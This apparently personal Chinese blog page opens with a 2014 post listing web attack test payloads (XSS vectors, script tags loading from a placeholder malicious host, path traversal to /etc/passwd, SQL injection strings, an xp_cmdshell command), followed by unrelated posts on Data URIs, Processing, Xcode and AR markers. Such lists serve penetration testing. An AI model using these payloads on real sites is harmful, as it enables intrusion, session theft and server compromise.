2014年5月18日 星期日

XSS測試語法大全

Source: 不詳

><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')">

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

<script>alert('Vulnerable');</script>

<script>alert('Vulnerable')</script>

?sql_debug=1

a%5c.aspx

a.jsp/<script>alert('Vulnerable')</script>

a?<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

../../../../../../../../etc/passwd

..\..\..\..\..\..\..\..\windows\system.ini

\..\..\..\..\..\..\..\..\windows\system.ini

'';!--"<XSS>=&{()}

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert("XSS")>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascript:alert('XSS');">

"<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<IMG SRC=" javascript:alert('XSS');">

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND SRC="javascript:alert('XSS');">

<br size="&{alert('XSS')}">

<LAYER SRC="http://惡意網址/a.js"></layer>

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="mocha:[code]">

<IMG SRC="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<IFRAME SRC=javascript:alert('XSS')></IFRAME>

<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="behaviour: url('http://惡意網址/exploit.html');">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<BASE HREF="javascript:alert('XSS');//">

getURL("javascript:alert('XSS')")

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

<XML SRC="javascript:alert('XSS');">

"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

<SCRIPT SRC="http://惡意網址/xss.jpg"></SCRIPT>

<IMG SRC="javascript:alert('XSS')"

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://惡意網址/a.js></SCRIPT>'"-->

<IMG SRC="http://惡意網址/somecommand.php?somevariables=maliciouscode">

<SCRIPT a=">" SRC="http://惡意網址/a.js"></SCRIPT>

<SCRIPT =">" SRC="http://惡意網址/a.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://惡意網址/a.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://惡意網址/a.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://惡意網址/a.js"></SCRIPT>

<A HREF=http://惡意網址/>link</A>

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="aXSS測試語法><script>alert(document.cookie)</script>

2014年5月15日 星期四

Data URI 網頁裡內嵌檔案

在網頁內可以直接將圖檔嵌入,只需要先將檔案用 base64 編碼即可。可直接利用網路上的服務即可直接轉換。

Convert any image into a base64 string

底下測試一下


測試:blog裡加入程式碼檢視功能

測試在blog裡加上程式碼的檢視功能,在範本裡加了JavaScript及CSS。

PImage img;
String url = "http://chart.apis.google.com/chart?cht=qr&chl=www.mmc.knu.edu.tw&chs=300x300";

void setup()
{
  size(400, 400);
  img = loadImage(url, "png");
  image(img, 50, 50);

}

方法參考來源:

2011年12月5日 星期一

xcode 4.2 增加的 ARC 功能

感覺是屬於進階的問題,然而對首次編寫 iOS 程式,且使用 xcode 4.2 的使用者來說,常常會無法在自己的環境中順利編譯好程式,而造成學習上的困擾,所以就算不清楚理論,還是得知道它的做法。

有一些文章寫得很清楚,值得好好讀一下:

還有一些論壇裡的討論

2011年11月29日 星期二

AR 的標誌圖卡製作

這個網站提供直接經由網路製作 AR 的圖卡,也含有 source 可學習。不過,現階段先試試看能不能順利製作所需的圖卡資料為主。

Marker's Generator Online

Processing + RFID

近期準備試驗 RFID 的功能,主要也是想要能夠和 Arduino 或 Processing 的互動結合。先找了幾個網站,找機會試試。


2011年11月20日 星期日

利用 xcode 學習 Objective-C

一份很不錯的學習資料『Becom an Xcoder』也有正體中文的譯本,很值得參考!

而原文作者也有推出新版的內容,可在此參考
http://www.cocoalab.com/?q=becomeanxcoder